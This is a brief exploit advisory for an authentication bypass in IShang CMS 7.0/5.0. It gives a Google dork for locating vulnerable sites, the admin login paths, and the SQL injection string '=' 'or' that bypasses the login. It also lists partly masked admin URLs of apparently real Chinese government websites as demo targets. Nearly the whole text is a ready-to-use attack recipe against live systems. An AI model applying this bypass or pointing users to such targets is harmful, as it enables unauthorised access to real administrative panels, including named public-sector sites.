######################
# Exploit Title : IShang CMS Login Page Bypass Vulnerability
# Exploit Author : Adrian
# Vendor Homepage : http://www.ishang.net/
# Google Dork : intext:"技术支持:安徽商网"
# Date: 2013/12/28
# Tested On : Win8
# Software Link : http://www.ishang.net/
# Version : 7.0 / 5.0
######################
#*
# 1) http://site.com/[path]/admin/
# 2) http://site.com/[path]/mywebs/
#
# String For Bypass : '=' 'or'
#
# Demo:
#
http://www.Xl.gov.cn/admin/
#
http://www.laXXjXj.gov.cn/admin/
#
http://fX.XXX.gov.cn/admin/
#
http://gXS.aX.gov.cn/admin/
#
http://sangXov.cn/admin/
#
http://www.mXXyj.gov.cn/admin/
#
######################
# discovered by : Adrian
######################**
